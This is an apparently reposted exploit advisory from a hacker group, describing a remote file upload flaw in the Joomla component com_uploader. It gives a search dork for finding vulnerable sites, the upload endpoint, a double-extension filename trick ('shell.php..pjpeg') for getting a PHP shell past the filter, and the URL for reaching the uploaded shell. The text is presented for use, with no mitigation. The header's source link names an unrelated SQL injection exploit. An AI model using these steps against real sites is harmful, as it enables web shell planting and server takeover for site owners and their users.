且构网

分享程序员开发的那些事...
且构网 - 分享程序员编程开发的那些事

Joomla Component com_uploader) Remote File Upload Vulnerability

更新时间:2022-09-18 20:49:04

http://packetstormsecurity.org/1001-exploits/joomlaarticlemanager-sql.txt
                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' /            __  /'__`/        // /__  /'__`/       //  ___/    |
|  //_, /    ___   //_///_/L/ /    ___/ / ,_/// /// /  _ __/ / /__/    |
|  //_// / /' _ `/ /// //_/_/_<_  /'___/ / /// / / / ///`'__/ /___``/  |
|     / / /// /// / / / /// /L/ /// /__// / /_/ / /_/ / / // /// /L/ / |
|      / /_/ /_/ /_/_/ / / /____// /____// /__// /____// /_/  / /____/ |
|       //_///_///_// /_/ //___/  //____/ //__/ //___/  //_/   //___/  |
|                  / /____/ >> team wlhaan hacker                      |
|                   //___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


_____________________________________________________
Joomla Component com_uploader)  Remote File Upload Vulnerability )

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+]  team wlhaan Hacker     #
# [+]  dork:"index.php?option=com_uploader"
#####################################################

The exploit :

 http://localhost/index.php?option=com_uploader


chaneg shell

shell.php..pjpeg


Get now shell :

http://localhost/path/upload//1263581195_shell.php.pjpeg


and good luck :D

Thanks to : shooq hacker ..

#####################################################
________________________________
حمل الأن Emoticons عربية جديدة للماسنجر! حمل الأن<http://arabic.arabia.msn.com/eidemoticons>